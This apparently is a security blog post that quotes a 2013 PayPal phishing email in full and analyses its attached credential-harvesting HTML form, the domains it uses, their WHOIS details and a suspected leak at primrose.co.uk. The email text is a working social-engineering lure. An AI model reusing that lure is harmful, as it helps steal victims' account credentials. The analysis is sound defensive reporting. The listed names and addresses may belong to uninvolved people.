From: paypal.co.uk [firstname.lastname@example.org]
Date: 18 July 2013 11:01
Subject: We cannot process your payment at this time.
We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ?
It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.
Reference Number: PP-001-278-254-803
It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.
Download the attached document and open it in a browser window secure.
Confirm that you are the account holder and follow the instructions.
Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589
The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www.thesenddirect.com (188.8.131.52 - Aruba, Italy) and submitting the data to www.paypserv.com (184.108.40.206 - also Aruba). The WHOIS details are no doubt fake are are respectively:
Saunders, John Alan email@example.com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
Clarke, Victoria firstname.lastname@example.org
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
Primrose.co.uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything.
Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose.co.uk it is impossible to say if any financial data has been compromised.